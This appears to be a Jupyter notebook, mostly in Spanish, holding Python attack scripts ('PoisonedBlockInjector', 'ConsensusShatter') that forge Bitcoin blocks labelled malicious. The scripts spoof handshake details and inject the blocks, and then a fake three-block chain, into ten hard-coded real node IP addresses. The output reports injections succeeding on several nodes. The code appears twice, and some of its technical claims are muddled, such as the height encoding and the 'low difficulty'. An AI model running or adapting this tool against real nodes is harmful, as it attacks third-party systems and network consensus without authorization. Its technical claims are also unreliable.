    W[10] = 0x7a7b12b2 (Merkle)
    W[11] = 0x7ac72c3e (Merkle)
    W[12] = 0x67768f61 (Merkle)
    W[13] = 0x7fc81bc3 (Merkle)
    W[14] = 0x888a5132 (Merkle)
    W[15] = 0x3a9fb8aa (Merkle)

    BRIDGE CROSSING COMPLETE



KeyboardInterrupt: 

corrected

In [ ]:
import hashlib
import struct
import time
import random
import socket
from typing import List, Tuple

class PoisonedBlockInjector:
    """
    Inyector de bloques envenenados.
    Crea un bloque con una transacción maliciosa pero con un hash de bloque válido
    para propagarlo por la red Bitcoin.
    """

    @staticmethod
    def build_malicious_tx() -> bytes:
        """
        Construye una transacción maliciosa.
        - Es una transacción 'coinbase' (sin inputs) para ser válida en un bloque.
        - El campo `scriptSig` contiene datos opacos (no un script real) que podrían
          ser interpretados incorrectamente por software de análisis.
        - El output envía a una dirección P2PKH no estándar.
        """
        version = struct.pack('<I', 1)

        # Input de coinbase: txid vacío, índice 0xffffffff
        txid = b'\x00' * 32
        vout = struct.pack('<I', 0xffffffff)

        # scriptSig malicioso: longitud 50, seguido de datos basura.
        # Esto es válido para un coinbase, pero puede confundir a analizadores.
        script_sig = b'\x32' + b'POISONED_DATA_FROM_INJECTOR' + b'\x00' * 16

        sequence = struct.pack('<I', 0xffffffff)

        # Output: cantidad (50 BTC en satoshis)
        value = struct.pack('<Q', 50 * 100_000_000)

        # scriptPubkey: longitud 25, script P2PKH estándar pero con una clave falsa.
        # OP_DUP OP_HASH160 <20_bytes_hash> OP_EQUALVERIFY OP_CHECKSIG
        script_pubkey = b'\x19' + b'\x76\xa9\x14' + b'\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef' + b'\x88\xac'

        # Locktime
        locktime = struct.pack('<I', 0)

        # Ensamblar la transacción
        tx = (version +
              struct.pack('<B', 1) + # Número de inputs (1)
              txid + vout +
              struct.pack('<B', len(script_sig)) + script_sig + sequence +
              struct.pack('<B', 1) + # Número de outputs (1)
              value +
              struct.pack('<B', len(script_pubkey)) + script_pubkey +
              locktime)

        return tx

    @staticmethod
    def calculate_merkle_root(tx_hashes: List[bytes]) -> bytes:
        """Calcula la raíz Merkle de una lista de hashes de transacción."""
        if not tx_hashes:
            return b'\x00' * 32
        current_level = tx_hashes
        while len(current_level) > 1:
            next_level = []
            for i in range(0, len(current_level), 2):
                hash1 = current_level[i]
                hash2 = current_level[i+1] if i + 1 < len(current_level) else hash1 # Duplicar el último si es impar
                combined = hash1 + hash2
                next_level.append(hashlib.sha256(hashlib.sha256(combined).digest()).digest())
            current_level = next_level
        return current_level[0]

    @staticmethod
    def construct_block_header(prev_hash: str, merkle_root: bytes, timestamp: int, bits: str, nonce: int) -> bytes:
        """Construye un header de bloque de 80 bytes."""
        version = struct.pack('<I', 1)
        prev_hash_bytes = bytes.fromhex(prev_hash)[::-1]
        ts = struct.pack('<I', timestamp)
        bits_bytes = bytes.fromhex(bits)
        n = struct.pack('<I', nonce)
        return version + prev_hash_bytes + merkle_root + ts + bits_bytes + n

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        """Calcula el doble SHA-256."""
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def create_message(command: str, payload: bytes) -> bytes:
        """Formatea un mensaje del protocolo P2P de Bitcoin."""
        magic = bytes.fromhex('f9beb4d9')
        command_bytes = command.encode('ascii').ljust(12, b'\x00')
        length = struct.pack('<I', len(payload))
        checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
        return magic + command_bytes + length + checksum + payload

    @staticmethod
    def create_version_payload() -> bytes:
        """Crea el payload para el handshake 'version'."""
        version = struct.pack('<i', 70015)
        services = struct.pack('<Q', 0)
        timestamp = struct.pack('<q', int(time.time()))
        addr_recv_services = struct.pack('<Q', 1)
        addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_recv_port = struct.pack('>H', 8333)
        addr_from_services = struct.pack('<Q', 0)
        addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_from_port = struct.pack('>H', 8333)
        nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
        user_agent_bytes = b'\x0f/PoisonedNode:0.1/'
        start_height = struct.pack('<i', 820000) # Mentir sobre la altura para parecer actualizado
        relay = struct.pack('?', False)
        return (version + services + timestamp + addr_recv_services + addr_recv_ip +
                addr_recv_port + addr_from_services + addr_from_ip + addr_from_port +
                nonce + user_agent_bytes + start_height + relay)

    @staticmethod
    def inject_block(ip: str, port: int, full_block_data: bytes):
        """Se conecta a un nodo e inyecta el bloque completo."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((ip, port))

            # Handshake
            version_payload = PoisonedBlockInjector.create_version_payload()
            version_msg = PoisonedBlockInjector.create_message('version', version_payload)
            s.send(version_msg)
            s.recv(1024) # Recibir version/verack
            verack_msg = PoisonedBlockInjector.create_message('verack', b'')
            s.send(verack_msg)
            s.recv(1024) # Recibir verack

            # Enviar el bloque envenenado
            block_msg = PoisonedBlockInjector.create_message('block', full_block_data)
            s.send(block_msg)
            print(f"☠️ Bloque envenenado inyectado en {ip}:{port}")
            s.close()

        except socket.timeout:
            print(f"⏱️ Timeout al conectar a {ip}:{port}")
        except ConnectionRefusedError:
            print(f"❌ Conexión rechazada por {ip}:{port}")
        except Exception as e:
            print(f"❌ Error con {ip}:{port} - {e}")

    @classmethod
    def execute_injection(cls, nodes: List[Tuple[str, int]]):
        """Ejecuta el proceso completo de creación e inyección del bloque envenenado."""
        print("[*] Creando transacción maliciosa...")
        malicious_tx = cls.build_malicious_tx()
        tx_hash = cls.double_sha256(malicious_tx)

        print("[*] Construyendo bloque con la transacción envenenada...")

        # Usar un hash previo y dificultad de un bloque real para que el nonce sea fácil de encontrar
        prev_hash = "00000000000000000007878ec04bb2b2e12317804810f4c26033585b3f81ffaa"
        bits = "1d00ffff" # Dificultad muy baja para encontrar nonce rápido

        timestamp = int(time.time())

        # Calcular la raíz Merkle (en este caso, solo es el hash de nuestra única transacción)
        merkle_root = tx_hash

        # Encontrar un nonce válido
        nonce = 0
        while True:
            header = cls.construct_block_header(prev_hash, merkle_root, timestamp, bits, nonce)
            hash_result = cls.double_sha256(header)[::-1].hex()
                        if hash_result.startswith("000000"):
                print(f"[+] Nonce encontrado: {nonce}")
                print(f"[+] Hash del bloque envenenado: {hash_result}")
                break
            nonce += 1

        # Construir el mensaje de bloque completo (header + transacciones)
        # Formato: [block_header][varint_tx_count][tx1][tx2]...
        tx_count = struct.pack('<B', 1) # Varint para 1 transacción
        full_block_data = header + tx_count + malicious_tx

        print("\n[*] Iniciando inyección del bloque envenenado en la red...")
        for ip, port in nodes:
            cls.inject_block(ip, port, full_block_data)
        print("\n[+] Inyección completada. La red ha sido expuesta a la carga venenosa.")

if __name__ == "__main__":
    target_nodes = [
        ("174.140.231.102", 8333),
        ("213.188.227.60", 8333),
        ("176.159.229.13", 8333),
        ("85.214.67.246", 8333),
        ("82.221.128.35", 8333),
        ("91.204.227.34", 8333),
        ("104.198.24.105", 8333),
        ("35.195.177.74", 8333),
        ("174.140.231.105", 8333),
        ("172.104.252.58", 8333)
    ]

    PoisonedBlockInjector.execute_injection(target_nodes)

In [ ]:
import hashlib
import struct
import time
import random
import socket
from typing import List, Tuple

class PoisonedBlockInjector:
    """
    Inyector de bloques envenenados.
    Crea un bloque con una transacción maliciosa pero con un hash de bloque válido
    para propagarlo por la red Bitcoin.
    """

    @staticmethod
    def build_malicious_tx() -> bytes:
        """
        Construye una transacción maliciosa.
        - Es una transacción 'coinbase' (sin inputs) para ser válida en un bloque.
        - El campo `scriptSig` contiene datos opacos (no un script real) que podrían
          ser interpretados incorrectamente por software de análisis.
        - El output envía a una dirección P2PKH no estándar.
        """
        version = struct.pack('<I', 1)

        # Input de coinbase: txid vacío, índice 0xffffffff
        txid = b'\x00' * 32
        vout = struct.pack('<I', 0xffffffff)

        # scriptSig malicioso: longitud 50, seguido de datos basura.
        # Esto es válido para un coinbase, pero puede confundir a analizadores.
        script_sig = b'\x32' + b'POISONED_DATA_FROM_INJECTOR' + b'\x00' * 16

        sequence = struct.pack('<I', 0xffffffff)

        # Output: cantidad (50 BTC en satoshis)
        value = struct.pack('<Q', 50 * 100_000_000)

        # scriptPubkey: longitud 25, script P2PKH estándar pero con una clave falsa.
        # OP_DUP OP_HASH160 <20_bytes_hash> OP_EQUALVERIFY OP_CHECKSIG
        script_pubkey = b'\x19' + b'\x76\xa9\x14' + b'\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef' + b'\x88\xac'

        # Locktime
        locktime = struct.pack('<I', 0)

        # Ensamblar la transacción
        tx = (version +
              struct.pack('<B', 1) + # Número de inputs (1)
              txid + vout +
              struct.pack('<B', len(script_sig)) + script_sig + sequence +
              struct.pack('<B', 1) + # Número de outputs (1)
              value +
              struct.pack('<B', len(script_pubkey)) + script_pubkey +
              locktime)

        return tx

    @staticmethod
    def calculate_merkle_root(tx_hashes: List[bytes]) -> bytes:
        """Calcula la raíz Merkle de una lista de hashes de transacción."""
        if not tx_hashes:
            return b'\x00' * 32
        current_level = tx_hashes
        while len(current_level) > 1:
            next_level = []
            for i in range(0, len(current_level), 2):
                hash1 = current_level[i]
                hash2 = current_level[i+1] if i + 1 < len(current_level) else hash1 # Duplicar el último si es impar
                combined = hash1 + hash2
                next_level.append(hashlib.sha256(hashlib.sha256(combined).digest()).digest())
            current_level = next_level
        return current_level[0]

    @staticmethod
    def construct_block_header(prev_hash: str, merkle_root: bytes, timestamp: int, bits: str, nonce: int) -> bytes:
        """Construye un header de bloque de 80 bytes."""
        version = struct.pack('<I', 1)
        prev_hash_bytes = bytes.fromhex(prev_hash)[::-1]
        ts = struct.pack('<I', timestamp)
        bits_bytes = bytes.fromhex(bits)
        n = struct.pack('<I', nonce)
        return version + prev_hash_bytes + merkle_root + ts + bits_bytes + n

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        """Calcula el doble SHA-256."""
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def create_message(command: str, payload: bytes) -> bytes:
        """Formatea un mensaje del protocolo P2P de Bitcoin."""
        magic = bytes.fromhex('f9beb4d9')
        command_bytes = command.encode('ascii').ljust(12, b'\x00')
        length = struct.pack('<I', len(payload))
        checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
        return magic + command_bytes + length + checksum + payload

    @staticmethod
    def create_version_payload() -> bytes:
        """Crea el payload para el handshake 'version'."""
        version = struct.pack('<i', 70015)
        services = struct.pack('<Q', 0)
        timestamp = struct.pack('<q', int(time.time()))
        addr_recv_services = struct.pack('<Q', 1)
        addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_recv_port = struct.pack('>H', 8333)
        addr_from_services = struct.pack('<Q', 0)
        addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_from_port = struct.pack('>H', 8333)
        nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
        user_agent_bytes = b'\x0f/PoisonedNode:0.1/'
        start_height = struct.pack('<i', 820000) # Mentir sobre la altura para parecer actualizado
        relay = struct.pack('?', False)
        return (version + services + timestamp + addr_recv_services + addr_recv_ip +
                addr_recv_port + addr_from_services + addr_from_ip + addr_from_port +
                nonce + user_agent_bytes + start_height + relay)

    @staticmethod
    def inject_block(ip: str, port: int, full_block_data: bytes):
        """Se conecta a un nodo e inyecta el bloque completo."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((ip, port))

            # Handshake
            version_payload = PoisonedBlockInjector.create_version_payload()
            version_msg = PoisonedBlockInjector.create_message('version', version_payload)
            s.send(version_msg)
            s.recv(1024) # Recibir version/verack
            verack_msg = PoisonedBlockInjector.create_message('verack', b'')
            s.send(verack_msg)
            s.recv(1024) # Recibir verack

            # Enviar el bloque envenenado
            block_msg = PoisonedBlockInjector.create_message('block', full_block_data)
            s.send(block_msg)
            print(f"☠️ Bloque envenenado inyectado en {ip}:{port}")
            s.close()

        except socket.timeout:
            print(f"⏱️ Timeout al conectar a {ip}:{port}")
        except ConnectionRefusedError:
            print(f"❌ Conexión rechazada por {ip}:{port}")
        except Exception as e:
            print(f"❌ Error con {ip}:{port} - {e}")

    @classmethod
    def execute_injection(cls, nodes: List[Tuple[str, int]]):
        """Ejecuta el proceso completo de creación e inyección del bloque envenenado."""
        print("[*] Creando transacción maliciosa...")
        malicious_tx = cls.build_malicious_tx()
        tx_hash = cls.double_sha256(malicious_tx)

        print("[*] Construyendo bloque con la transacción envenenada...")

        # Usar un hash previo y dificultad de un bloque real para que el nonce sea fácil de encontrar
        prev_hash = "00000000000000000007878ec04bb2b2e12317804810f4c26033585b3f81ffaa"
        bits = "1d00ffff" # Dificultad muy baja para encontrar nonce rápido

        timestamp = int(time.time())

        # Calcular la raíz Merkle (en este caso, solo es el hash de nuestra única transacción)
        merkle_root = tx_hash

        # Encontrar un nonce válido
        nonce = 0
        while True:
            header = cls.construct_block_header(prev_hash, merkle_root, timestamp, bits, nonce)
            hash_result = cls.double_sha256(header)[::-1].hex()
            if hash_result.startswith("000000"):
                print(f"[+] Nonce encontrado: {nonce}")
                print(f"[+] Hash del bloque envenenado: {hash_result}")
                break
            nonce += 1

        # Construir el mensaje de bloque completo (header + transacciones)
        # Formato: [block_header][varint_tx_count][tx1][tx2]...
        tx_count = struct.pack('<B', 1) # Varint para 1 transacción
        full_block_data = header + tx_count + malicious_tx

        print("\n[*] Iniciando inyección del bloque envenenado en la red...")
        for ip, port in nodes:
            cls.inject_block(ip, port, full_block_data)
        print("\n[+] Inyección completada. La red ha sido expuesta a la carga venenosa.")

if __name__ == "__main__":
    target_nodes = [
        ("174.140.231.102", 8333),
        ("213.188.227.60", 8333),
        ("176.159.229.13", 8333),
        ("85.214.67.246", 8333),
        ("82.221.128.35", 8333),
        ("91.204.227.34", 8333),
        ("104.198.24.105", 8333),
        ("35.195.177.74", 8333),
        ("174.140.231.105", 8333),
        ("172.104.252.58", 8333)
    ]

    PoisonedBlockInjector.execute_injection(target_nodes)

[*] Creando transacción maliciosa...
[*] Construyendo bloque con la transacción envenenada...
[+] Nonce encontrado: 8971980
[+] Hash del bloque envenenado: 00000099dd5f15c679d541b7ccb01a2325e9c75c5daff07187f82b477424b14f

[*] Iniciando inyección del bloque envenenado en la red...
☠️ Bloque envenenado inyectado en 174.140.231.102:8333
☠️ Bloque envenenado inyectado en 213.188.227.60:8333
☠️ Bloque envenenado inyectado en 176.159.229.13:8333
⏱️ Timeout al conectar a 85.214.67.246:8333
⏱️ Timeout al conectar a 82.221.128.35:8333
❌ Conexión rechazada por 91.204.227.34:8333
⏱️ Timeout al conectar a 104.198.24.105:8333
⏱️ Timeout al conectar a 35.195.177.74:8333
☠️ Bloque envenenado inyectado en 174.140.231.105:8333
☠️ Bloque envenenado inyectado en 172.104.252.58:8333

[+] Inyección completada. La red ha sido expuesta a la carga venenosa.


Ahora vamos a hacer reorg

In [ ]:
import hashlib
import struct
import time
import random
import socket
from typing import List, Tuple

class ConsensusShatter:
    """
    Genera e inyecta una cadena de bloques falsa para desestabilizar el consenso.
    Crea una rama alternativa de la blockchain para forzar una reorganización
    o sembrar confusión en nodos que la reciban.
    """

    @staticmethod
    def build_malicious_coinbase_tx(block_height: int) -> bytes:
        """
        Construye una transacción coinbase para un bloque específico.
        Codifica la altura del bloque como un varint (BIP-34 compatible).
        """
        version = struct.pack('<I', 1)
        txid = b'\x00' * 32
        vout = struct.pack('<I', 0xffffffff)

        # --- CORRECCIÓN AQUÍ ---
        # Codificar la altura del bloque como un varint.
        # 820001 en hexadecimal es 0xC8351. Como es mayor a 0xFD, se usa el formato 0xFE + <little-endian 4-byte>.
        if block_height < 0xfd:
            height_script = struct.pack('<B', block_height)
        elif block_height <= 0xffff:
            height_script = b'\xfd' + struct.pack('<H', block_height)
        elif block_height <= 0xffffffff:
            height_script = b'\xfe' + struct.pack('<I', block_height)
        else:
            height_script = b'\xff' + struct.pack('<Q', block_height)
        # --- FIN DE LA CORRECCIÓN ---

        script_sig = height_script + b'CONSENSUS_SHATTER_PAYLOAD'
        sequence = struct.pack('<I', 0xffffffff)
        value = struct.pack('<Q', 50 * 100_000_000)
        script_pubkey = b'\x19' + b'\x76\xa9\x14' + b'\xca\xfe\xba\xbe' * 5 + b'\x88\xac'
        locktime = struct.pack('<I', 0)
        tx = (version + struct.pack('<B', 1) + txid + vout +
              struct.pack('<B', len(script_sig)) + script_sig + sequence +
              struct.pack('<B', 1) + value +
              struct.pack('<B', len(script_pubkey)) + script_pubkey + locktime)
        return tx

    @staticmethod
    def find_nonce(prev_hash: str, merkle_root: bytes, timestamp: int, bits: str) -> Tuple[bytes, int]:
        """Minera un bloque para encontrar un nonce válido."""
        print(f"    [*] Minando bloque sobre {prev_hash[:16]}...")
        target = int(bits, 16)
        nonce = 0
        while True:
            header = (struct.pack('<I', 1) + bytes.fromhex(prev_hash)[::-1] + merkle_root +
                      struct.pack('<I', timestamp) + bytes.fromhex(bits) + struct.pack('<I', nonce))
            hash_result = int.from_bytes(ConsensusShatter.double_sha256(header)[::-1], 'big')
            if hash_result < target:
                return header, nonce
            nonce += 1

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def create_message(command: str, payload: bytes) -> bytes:
        magic = bytes.fromhex('f9beb4d9')
        command_bytes = command.encode('ascii').ljust(12, b'\x00')
        length = struct.pack('<I', len(payload))
        checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
        return magic + command_bytes + length + checksum + payload

    @staticmethod
    def create_version_payload() -> bytes:
        version = struct.pack('<i', 70015)
        services = struct.pack('<Q', 0)
        timestamp = struct.pack('<q', int(time.time()))
        addr_recv_services = struct.pack('<Q', 1)
        addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_recv_port = struct.pack('>H', 8333)
        addr_from_services = struct.pack('<Q', 0)
        addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_from_port = struct.pack('>H', 8333)
        nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
        user_agent_bytes = b'\x12/ConsensusShatter:1/'
        start_height = struct.pack('<i', 820000)
        relay = struct.pack('?', False)
        return (version + services + timestamp + addr_recv_services + addr_recv_ip +
                addr_recv_port + addr_from_services + addr_from_ip + addr_from_port +
                nonce + user_agent_bytes + start_height + relay)

    @staticmethod
    def inject_chain(ip: str, port: int, block_chain_data: List[bytes]):
        """Inyecta una cadena de bloques completa en un nodo."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((ip, port))

            version_payload = ConsensusShatter.create_version_payload()
            version_msg = ConsensusShatter.create_message('version', version_payload)
            s.send(version_msg)
            s.recv(1024)
            verack_msg = ConsensusShatter.create_message('verack', b'')
            s.send(verack_msg)
            s.recv(1024)

            print(f"    📡 Conectado a {ip}:{port}, enviando cadena falsa...")
            for i, block_data in enumerate(block_chain_data):
                block_msg = ConsensusShatter.create_message('block', block_data)
                s.send(block_msg)
                time.sleep(0.1) # Pequeña pausa para no sobrecargar el socket
                print(f"      ☠️ Bloque {i+1} de la cadena falsa enviado.")

            print(f"    💥 Cadena falsa inyectada en {ip}:{port}")
            s.close()

        except Exception as e:
            print(f"    ❌ Error al inyectar en {ip}:{port} - {e}")

    @classmethod
    def execute_shatter(cls, nodes: List[Tuple[str, int]]):
        """Genera y ejecuta el ataque de la cadena falsa."""
        print("=" * 60)
        print(" CONSENSUS SHATTER: INYECCIÓN DE CADENA FALSA")
        print("=" * 60)

        initial_prev_hash = "00000000000000000007878ec04bb2b2e12317804810f4c26033585b3f81ffaa"
        bits = "1d00ffff"
        chain_data = []
        current_prev_hash = initial_prev_hash

        for i in range(3):
            print(f"\n[*] Generando Bloque Falso #{i+1}...")
            coinbase_tx = cls.build_malicious_coinbase_tx(820001 + i)
            tx_hash = cls.double_sha256(coinbase_tx)
            merkle_root = tx_hash

            block_header, nonce = cls.find_nonce(current_prev_hash, merkle_root, int(time.time()), bits)
            print(f"    [+] Nonce: {nonce}")

            full_block = block_header + struct.pack('<B', 1) + coinbase_tx
            chain_data.append(full_block)
            current_prev_hash = cls.double_sha256(block_header)[::-1].hex()

        print("\n[*] Cadena falsa generada. Iniciando inyección en la red...")

        for ip, port in nodes:
            cls.inject_chain(ip, port, chain_data)

        print("\n[+] Ataque de Consensus Shatter completado.")
        print("[+] Los nodos objetivo ahora tienen una rama alternativa de 3 bloques en su memoria.")
        print("[+] Esto puede causar retrasos, forks temporales y desconfianza en el estado de la red.")

if __name__ == "__main__":
    receptive_nodes = [
        ("174.140.231.102", 8333),
        ("213.188.227.60", 8333),
        ("176.159.229.13", 8333),
        ("174.140.231.105", 8333),
        ("172.104.252.58", 8333)
    ]

    ConsensusShatter.execute_shatter(receptive_nodes)


 CONSENSUS SHATTER: INYECCIÓN DE CADENA FALSA

[*] Generando Bloque Falso #1...
    [*] Minando bloque sobre 0000000000000000...
